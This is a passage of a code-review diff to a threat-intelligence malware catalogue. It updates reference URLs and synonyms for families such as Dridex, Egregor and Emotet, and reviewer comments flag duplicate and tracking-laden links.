- "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction",
- "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
- "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf",
- "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://en.wikipedia.org/wiki/Maksim_Yakubets",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/",
- "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://home.treasury.gov/news/press-releases/sm845",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://unit42.paloaltonetworks.com/travel-themed-phishing/",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
 "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
 "https://twitter.com/TheDFIRReport/status/1356729371931860992",
- "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf",
 "https://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf",
- "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
- "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/",
+ "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/",
- "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/",
 "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps",
 "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
 "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
 "https://viql.github.io/dridex/",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf",
+ "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://blog.lexfo.fr/dridex-malware.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
+ "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/",
+ "https://www.youtube.com/watch?v=1VB15_HgUkg",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
+ "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/",
+ "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
+ "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/",
+ "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf",
+ "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf",
+ "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
+ "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
 "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/",
+ "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
+ "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction",
 "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation",
- "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/"
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://en.wikipedia.org/wiki/Maksim_Yakubets",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
+ "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://malwarebookreports.com/cryptone-cobalt-strike/",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf",
+ "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://twitter.com/felixw3000/status/1382614469713530883?s=20"
 ],
 "synonyms": [],
 "type": []
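Review bot: The Dridex refs now hold both the kept `https://www.secureworks.com/research/threat-profiles/gold-heron` and the added `http://www.secureworks.com/research/threat-profiles/gold-heron`, and likewise both scheme variants of `.../threat-profiles/gold-drake`; the plain-http forms are duplicates that send an analyst over an unencrypted fetch to a vendor page, so drop them or normalize the scheme to https before merge. The added `https://twitter.com/felixw3000/status/1382614469713530883?s=20` carries Twitter's share-tracking parameter, which will turn a future import of the canonical tweet URL into another string-level duplicate. Most of this hunk's removals are the same URLs re-added lower in the list, which suggests the list is not emitted in a stable order; sorting refs uniquely in whatever produces this file would reduce hunks like this to the real additions. The fix likely belongs in the import step rather than in this JSON, if such a step exists.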
@@ -14153,6 +16343,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack",
 "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/",
+ "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20",
 "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/",
 "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
@@ -14164,7 +16355,9 @@
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko"
 ],
- "synonyms": [],
+ "synonyms": [
+ "TroyRAT"
+ ],
 "type": []
 },
 "uuid": "414f95e1-aabe-4aa9-b9be-53e0826f62c1",
@@ -14229,6 +16422,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu",
+ "https://docs.broadcom.com/doc/w32-duqu-11-en",
 "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
 "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/",
 "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
@@ -14280,6 +16474,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack",
+ "https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch",
 "https://content.fireeye.com/apt/rpt-apt38",
 "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
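Review bot: The added Dtrack reference `https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20` keeps Twitter's `?s=20` share-tracking suffix; refs in this galaxy are matched as plain strings, so a later addition of the same tweet without the suffix would produce a duplicate. Strip the query string: `"https://twitter.com/ShadowChasing1/status/1399369260577681426",`. The same list already carries two cyberbit.com URLs that appear to be one article under two paths, which is pre-existing but shows the dedupe gap is real. The Dtrack entry's refs array begins and ends outside this hunk.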
@@ -14298,15 +16493,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
 "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
 "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
 "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
 "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html",
 "https://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/"
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://www.secureworks.com/research/dyre-banking-trojan"
 ],
 "synonyms": [
 "Dyreza"
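Review bot: The added `http://www.secureworks.com/research/threat-profiles/gold-blackburn` duplicates the existing `https://www.secureworks.com/research/threat-profiles/gold-blackburn` a few lines below, differing only in scheme. Keep the https entry and drop the http one: a plain-http pointer to a threat-intel vendor invites a downgrade or injected content when an analyst follows it, and it adds nothing the https entry does not already provide. If the upstream source emits http URLs, normalizing the scheme during import would stop this pattern from recurring across the galaxy.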
@@ -14349,25 +16548,34 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
 "https://www.intrinsec.com/egregor-prolock/",
+ "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
 "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
 "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
 "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/",
 "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
 "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/",
- "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf",
- "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware",
 "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware",
+ "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf",
 "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
 "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/",
 "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html",
+ "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
 "https://www.group-ib.com/blog/egregor",
 "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
@@ -14375,20 +16583,29 @@
 "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/",
 "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
 "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/",
+ "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/",
 "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
 "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
 "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
 "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/",
+ "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/",
 "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor",
 "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf",
- "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
 "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
 "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
 "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
 "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/"
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
+ "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/"
 ],
 "synonyms": [],
 "type": []
@@ -14463,6 +16680,7 @@
 "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
 "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
 "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
 "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf"
 ],
 "synonyms": [
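Review bot: The added Egregor reference `https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3` is an unattributed, owner-editable Google Sheet, which is a weak citation for a threat-intel cluster: its contents can be changed or withdrawn without trace, and nothing in the entry says who maintains it or what it holds. Prefer an archived snapshot, as this same hunk already does for the Group-IB PDF via web.archive.org, or cite the publication that points to the sheet instead. If it has to stay, a `web.archive.org` capture of the export URL at least fixes what was reviewed.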
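Review bot: The added Emissary reference `https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries` points at a repository root rather than the specific hunting query that concerns Emissary, so a reader cannot tell which file is meant and the link will drift as the repository changes. Pin it to the query file at a commit (a `.../blob/<sha>/<path>.md` or `.yaml` URL), which keeps the reference reproducible. The Emissary entry's refs array begins outside this hunk.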
@@ -14523,7 +16741,7 @@
 "value": "Emissary"
 },
 {
- "description": "While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.\r\nIt is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.",
+ "description": "While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.\r\nIt is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.\r\nEmotet has been taken down in January 2021.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet",
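Review bot: The appended sentence `Emotet has been taken down in January 2021.` is grammatically off and records a one-time event as if it were a permanent state, while the rest of the description still speaks of the botnet in the present tense. Suggest `Emotet's infrastructure was disrupted in January 2021 by an international law-enforcement operation (see the Europol/Eurojust, BKA and DOJ references).`, which is what the bka.de, justice.gov and eurojust.europa.eu refs in this entry actually document and leaves room to amend the description if the botnet is observed again. A description stating the takedown as final could mislead responders who rely on it when triaging a new Emotet-like infection.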
@@ -14536,6 +16754,8 @@
 "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
 "https://www.jpcert.or.jp/english/at/2019/at190044.html",
 "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
 "https://twitter.com/raashidbhatt/status/1237853549200936960",
 "https://www.us-cert.gov/ncas/alerts/TA18-201A",
 "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf",
@@ -14544,6 +16764,10 @@
 "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return",
+ "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
 "https://www.secureworks.com/research/threat-profiles/gold-crestwood",
 "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/",
 "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf",
@@ -14553,6 +16777,7 @@
 "https://www.digitalshadows.com/blog-and-research/emotet-disruption/",
 "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/",
 "https://www.youtube.com/watch?v=_BLOmClsSpc",
+ "https://unit42.paloaltonetworks.com/c2-traffic/",
 "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol",
 "https://paste.cryptolaemus.com",
 "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html",
@@ -14566,26 +16791,29 @@
 "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69",
 "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://blog.talosintelligence.com/2020/11/emotet-2020.html",
 "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
 "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
 "https://www.hornetsecurity.com/en/security-information/emotet-is-back/",
 "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures",
+ "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html",
 "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728",
 "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/",
 "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b",
- "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
+ "https://unit42.paloaltonetworks.com/emotet-command-and-control/",
 "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/",
 "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html",
 "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
 "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/",
 "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
 "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
 "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
